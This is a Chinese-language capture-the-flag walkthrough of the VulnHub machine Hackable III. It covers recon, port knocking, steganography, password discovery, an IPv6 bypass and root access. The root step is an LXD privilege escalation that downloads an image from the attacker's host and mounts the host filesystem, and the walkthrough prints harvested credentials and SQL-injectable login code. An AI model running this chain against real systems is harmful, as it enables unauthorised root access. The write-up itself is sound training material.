VulnHub-Hackable III-Walkthrough

信息收集

服务探测

只开放了80端口，有点反常了

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.180  08:00:27:11:87:ae       (Unknown)
192.168.60.254  00:50:56:e4:cc:f0       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.939 seconds (132.03 hosts/sec). 4 responded
❯ export ip=192.168.60.180
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.180:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 13:02 CST
Initiating ARP Ping Scan at 13:02
Scanning 192.168.60.180 [1 port]
Completed ARP Ping Scan at 13:02, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:02
Completed Parallel DNS resolution of 1 host. at 13:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:02
Scanning 192.168.60.180 [1 port]
Discovered open port 80/tcp on 192.168.60.180
Completed SYN Stealth Scan at 13:02, 0.06s elapsed (1 total ports)
Nmap scan report for 192.168.60.180
Host is up, received arp-response (0.00060s latency).
Scanned at 2025-02-14 13:02:17 CST for 0s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:11:87:AE (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

浏览器访问80端口发现是一张图片

open字样

端口敲击

curl一下网页，发现注释中藏了一段话

那我大概就明白了是什么意思

敲击端口以激活22端口

还有一个jpg图片和一个jubiscleudo用户名

❯ curl http://192.168.60.180/
<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <link href="https://fonts.googleapis.com/css?family=RocknRoll+One" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="css/file.css">
    <title>Kryptos - LAN Home</title>

</head>
<body>
    <a href="#" class="menu-open"><img   src="imagens/logo_menu.png"  width="2" height="2"></a>
    <div class="overlay"></div>
    <div class="menu">
      <a href="#" class="menu-close">&times;</a>
      <ul>
        <li><a href="login_page/login.html" target="_blank">Login</a></li>

      </ul>

    </div>
    <!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - [email protected]" -->
    <!-- 请，jubiscleudo，在离开您的区域时不要忘记激活端口敲击，并告诉老板不要忘记批准.jpg文件 - [email protected]>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="js/script.js"></script>
</body>
</html>

尝试扫一下目录

❯ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.180/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 314] [--> http://192.168.60.180/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.60.180/js/]
/config               (Status: 301) [Size: 317] [--> http://192.168.60.180/config/]
/backup               (Status: 301) [Size: 317] [--> http://192.168.60.180/backup/]
/imagens              (Status: 301) [Size: 318] [--> http://192.168.60.180/imagens/]
/login_page           (Status: 301) [Size: 321] [--> http://192.168.60.180/login_page/]
/server-status        (Status: 403) [Size: 279]
Progress: 220559 / 220560 (100.00%)
===============================================================
Finished
===============================================================

其中config中有个1.txt

我curl一下，发现是base64编码后的文本

解码一下得到10000

❯ curl "http://192.168.60.180/config/1.txt"|base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--  100     9  100     9    0     0    735      0 --:--:-- --:--:-- --:--:--   750
10000%

再次收集得到2.txt

藏在css文件夹中

这串密文疑似Brainfuck编码

❯ curl http://192.168.60.180/css/2.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>------------------....%

网上找一下在线解码的得到端口4444

依照上面的提示，那第三个必然是图片了

在login_page目录中有个登录表单

但是无论你输入什么都会跳转到login.php中

curl一下返回了源代码

仔细审阅发现，有个3.jpg

❯ curl http://192.168.60.180/login.php
<?php
include('config.php');

$usuario = $_POST['user'];
$senha = $_POST['pass'];

$query = " SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";

$result = mysqli_query($conexao, $query);

$row = mysqli_num_rows($result);


#validação conta
if($row == 1) {
        $_SESSION['usuario'] = $usuario;
        header('Location: 3.jpg');
        exit();
} else {
        $_SESSION['nao_autenticado'] = true;
        header('Location: login_page/login.html');
        exit();
}


?>

我们wget一下

图片隐写

猜测含有图片隐写

尝试一下空密码

得到steganopayload148505.txt

拿到最后一个端口65535

❯ wget http://192.168.60.180/3.jpg
--2025-02-14 13:19:45--  http://192.168.60.180/3.jpg
Connecting to 192.168.60.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 61259 (60K) [image/jpeg]
Saving to: ‘3.jpg’

3.jpg                                 100%[=======================================================================>]  59.82K  --.-KB/s    in 0.003s

2025-02-14 13:19:45 (17.6 MB/s) - ‘3.jpg’ saved [61259/61259]
❯ steghide extract -sf 3.jpg
Enter passphrase:
wrote extracted data to "steganopayload148505.txt".
❯ cat steganopayload148505.txt
porta:65535 %

而且我们还在backup目录中拿到了wordlist.txt

乍看一眼好像rockyou

wget下来对比一下

取rockyou前300行，发现只有一行不一样

猜测这个就是上面用户名的密码onlymy

❯ wc -l wordlist.txt
300 wordlist.txt
❯ head -n 300 /usr/share/wordlists/rockyou.txt>wordlist_1
❯ diff wordlist.txt wordlist_1
205d204
< onlymy
300a300
> bowwow

尝试敲击端口以激活开放22端口

这回22是开放了

❯ knock $ip 10000 4444 65535
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.180:22
Open 192.168.60.180:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 13:25 CST
Initiating ARP Ping Scan at 13:25
Scanning 192.168.60.180 [1 port]
Completed ARP Ping Scan at 13:25, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:25
Completed Parallel DNS resolution of 1 host. at 13:25, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:25
Scanning 192.168.60.180 [2 ports]
Discovered open port 80/tcp on 192.168.60.180
Discovered open port 22/tcp on 192.168.60.180
Completed SYN Stealth Scan at 13:25, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.180
Host is up, received arp-response (0.00056s latency).
Scanned at 2025-02-14 13:25:43 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:11:87:AE (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

ssh连接一下

❯ ssh jubiscleudo@$ip
[email protected]'s password:
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Feb 14 05:26:18 AM UTC 2025

  System load: 0.04               Memory usage: 47%   Processes:       112
  Usage of /:  21.1% of 23.99GB   Swap usage:   0%    Users logged in: 0

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Feb 11 15:21:56 2025 from 192.168.60.100
jubiscleudo@ubuntu20:~$ ls -al
total 32
drwxr-x--- 3 jubiscleudo jubiscleudo 4096 Apr 29  2021 .
drwxr-xr-x 4 root        root        4096 Apr 29  2021 ..
-rw------- 1 jubiscleudo jubiscleudo  442 Feb 11 15:21 .bash_history
-rw-r--r-- 1 jubiscleudo jubiscleudo  220 Apr 29  2021 .bash_logout
-rw-r--r-- 1 jubiscleudo jubiscleudo 3771 Apr 29  2021 .bashrc
drwx------ 2 jubiscleudo jubiscleudo 4096 Apr 29  2021 .cache
-rw-r--r-- 1 jubiscleudo jubiscleudo  807 Apr 29  2021 .profile
-rw-r--r-- 1 jubiscleudo jubiscleudo 2984 Apr 27  2021 .user.txt
jubiscleudo@ubuntu20:~$ cat .user.txt
%                                              ,%&&%#.
%                                         *&&&&%%&%&&&&&&%
%                                       &&&&            .%&&&
%                                     &&&#                 %&&&
%                                   /&&&                     &&&.
%                                  %&%/                       %&&*
%                                 .&&#     (%%(,     ,(&&*     %&&
%                                 &&%    %&&&&&&&&&&&&&&%&%#    &&&
%                                 &&%&&&&&&&   #&&&&&*   &&&&&&&%&%
%                                 &&&&&&&&&&&&&&,   /&&&&&&&&&&&&&&
%                                 &&&&&&&%                 &&&&&&&&
%                                  %&&%&&&&              /&&&%&&&%
%                                 &.%&&% %&&%           &&&& %&&/*&
%                              &&&&&&&&&&  %&&&&#   %%&&&&  %&&&&&&&&&
%                           /&%&/   *&&&&&&   %&&&&&&%&   &&&&&&.   %&&&.
%                          &&&           &&%&           %%%%          .&&&
%                         &&%                                           &&&
%                        %&&.   *&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%&&    /&&(
%                       /&&#   #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&*   %&&
%                       &&%    ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%     %&%
%                      &&&      %&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&      %&&
%                      &&&      &&&&&&&&&&&&&&&%&   %&&&&&&&&&&&&&&&%      &&&
%                      %&&&%    &&&&&&&&&&&&&&&&     &&&&&&&&&&&&&&&%    &%&&#
%                        &&&&&&&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%                           &%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%
%                                &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%
%                                *&%&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%                                &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&%
%                                 #%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%(

invite-me: https://www.linkedin.com/in/eliastouguinho/

---

非预期解

其实在这里完全可以跳过端口敲击的步骤

可以通过ssh连接ipv6

但由于我的网络环境是基于WSL的

所以还需要开启一下ipv6

编辑.wslconfig添加ipv6=true

重启wsl

配置一下/etc/network/interfaces

ping一下本地局域网

❯ sudo vim /etc/network/interfaces
iface eth0 inet6 static
address fd15:4ba5:5a2b:1008::100
netmask 64
❯ sudo /etc/init.d/networking restart
Restarting networking (via systemctl): networking.service.
❯ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 5e:bb:f6:9e:ee:fa brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.100/24 brd 192.168.60.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fd15:4ba5:5a2b:1008::100/64 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::5cbb:f6ff:fe9e:eefa/64 scope link
       valid_lft forever preferred_lft forever
❯ ping6 -I eth0 -c 5 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=1 ttl=1 time=0.138 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=1 ttl=64 time=0.533 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=2 ttl=64 time=0.022 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=2 ttl=1 time=0.273 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=2 ttl=64 time=0.661 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=3 ttl=64 time=0.022 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=3 ttl=1 time=0.203 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=3 ttl=64 time=0.661 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=4 ttl=64 time=0.022 ms
64 bytes from fe80::250:56ff:fec0:2222%eth0: icmp_seq=4 ttl=1 time=0.492 ms
64 bytes from fe80::a00:27ff:fe11:87ae%eth0: icmp_seq=4 ttl=64 time=0.891 ms
64 bytes from fe80::5cbb:f6ff:fe9e:eefa%eth0: icmp_seq=5 ttl=64 time=0.027 ms

--- ff02::1 ping statistics ---
5 packets transmitted, 5 received, +8 duplicates, 0% packet loss, time 4149ms
rtt min/avg/max/mdev = 0.019/0.304/0.891/0.293 ms

得到了除了本机fe80::5cbb:f6ff:fe9e:eef还有一个是fe80::a00:27ff:fe11:87ae

nmap扫一下ipv6

22端口是开放的

❯ nmap -6 08:00:27:11:87:AE
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:28 CST
Failed to resolve "08:00:27:11:87:AE".
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.01 seconds
❯ nmap -6 fe80::a00:27ff:fe11:87ae
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:28 CST
Nmap scan report for fe80::a00:27ff:fe11:87ae
Host is up (0.00090s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:11:87:AE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
❯ ssh jubiscleudo@fe80::a00:27ff:fe11:87ae%eth0
The authenticity of host 'fe80::a00:27ff:fe11:87ae%eth0 (fe80::a00:27ff:fe11:87ae%eth0)' can't be established.
ED25519 key fingerprint is SHA256:eKPnFiq8KwR3xWNP5ZL/aPJYYx+GZaCVrzrHIL4rem4.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::a00:27ff:fe11:87ae%eth0' (ED25519) to the list of known hosts.
jubiscleudo@fe80::a00:27ff:fe11:87ae%eth0's password:
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Feb 14 06:33:30 AM UTC 2025

  System load: 0.0                Memory usage: 39%   Processes:       111
  Usage of /:  21.2% of 23.99GB   Swap usage:   0%    Users logged in: 0

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Fri Feb 14 05:26:19 2025 from 192.168.60.100
jubiscleudo@ubuntu20:~$

这样即可跳过上述敲击端口的步骤

---

用户提权

回到预期解

发现并没有sudo权限

再次信息收集

发现还有一个用户hackable_3

jubiscleudo@ubuntu20:~$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
hackable_3:x:1000:1000:hackable_3:/home/hackable_3:/bin/bash
jubiscleudo:x:1001:1001:,,,:/home/jubiscleudo:/bin/bash

在网站根目录中发现了备份的配置文件

拿到用户的密码TrOLLED_3尝试切换一下

jubiscleudo@ubuntu20:~$ cd /var/www/html/
jubiscleudo@ubuntu20:/var/www/html$ ls -la
total 124
drwxr-xr-x 8 root     root      4096 Jun 30  2021 .
drwxr-xr-x 3 root     root      4096 Apr 29  2021 ..
-rw-r--r-- 1 www-data www-data 61259 Apr 21  2021 3.jpg
drwxr-xr-x 2 www-data www-data  4096 Apr 23  2021 backup
-r-xr-xr-x 1 www-data www-data   522 Apr 29  2021 .backup_config.php
drwxr-xr-x 2 www-data www-data  4096 Apr 29  2021 config
-rw-r--r-- 1 www-data www-data   507 Apr 23  2021 config.php
drwxr-xr-x 2 www-data www-data  4096 Apr 21  2021 css
-rw-r--r-- 1 www-data www-data 11327 Jun 30  2021 home.html
drwxr-xr-x 2 www-data www-data  4096 Apr 21  2021 imagens
-rw-r--r-- 1 www-data www-data  1095 Jun 30  2021 index.html
drwxr-xr-x 2 www-data www-data  4096 Apr 20  2021 js
drwxr-xr-x 5 www-data www-data  4096 Jun 30  2021 login_page
-rw-r--r-- 1 www-data www-data   487 Apr 23  2021 login.php
-rw-r--r-- 1 www-data www-data    33 Apr 21  2021 robots.txt
jubiscleudo@ubuntu20:/var/www/html$ cat .backup_config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'hackable_3');
define('DB_PASSWORD', 'TrOLLED_3');
define('DB_NAME', 'hackable');

/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);


// Check connection
if($conexao === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>
jubiscleudo@ubuntu20:/var/www/html$ su hackable_3
Password:
hackable_3@ubuntu20:/var/www/html$ cd ~

---

其实有个作弊方案就是在靶机备注中写了用户密码🤣

直接登录就行了

root提权

lxd提权

看了一下用户权限组，发现隶属于lxd组中

直接lxd提权即可

hackable_3@ubuntu20:/var/www/html$ id
uid=1000(hackable_3) gid=1000(hackable_3) groups=1000(hackable_3),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

这与之前做过的另一个靶机提权方案相同

[[Vulnhub]Prime (2021) 2-Walkthrough | Pepster’Blog](https://pepster.me/VulnHub-Prime (2021) 2-Walkthrough/#Root提权)

hackable_3@ubuntu20:/tmp$ wget http://192.168.60.100/lxd.tar.xz
--2025-02-14 05:33:57--  http://192.168.60.100/lxd.tar.xz
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 896 [application/octet-stream]
Saving to: ‘lxd.tar.xz’

lxd.tar.xz                            100%[=======================================================================>]     896  --.-KB/s    in 0s

2025-02-14 05:33:57 (175 MB/s) - ‘lxd.tar.xz’ saved [896/896]

hackable_3@ubuntu20:/tmp$ wget http://192.168.60.100/rootfs.squashfs
--2025-02-14 05:34:03--  http://192.168.60.100/rootfs.squashfs
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3092480 (2.9M) [application/octet-stream]
Saving to: ‘rootfs.squashfs’

rootfs.squashfs                       100%[=======================================================================>]   2.95M  --.-KB/s    in 0.05s

2025-02-14 05:34:03 (58.4 MB/s) - ‘rootfs.squashfs’ saved [3092480/3092480]
hackable_3@ubuntu20:/tmp$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: 8300692522052a791a2509d9b6e81f74937de1bd3eb3289e747f3fbbc954aeaa
hackable_3@ubuntu20:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
hackable_3@ubuntu20:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
hackable_3@ubuntu20:/tmp$ lxc start privesc
hackable_3@ubuntu20:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
░░█▀░░░░░░░░░░░▀▀███████░░░░
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░░▄▌████████▄▄▄███████▌░░░░░▄
░▄▀░██████████████████▌▀▄░░░░
▀░░░█████▀▀░░░▀███████░░░▀▄░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░

invite-me: linkedin.com/in/eliastouguinho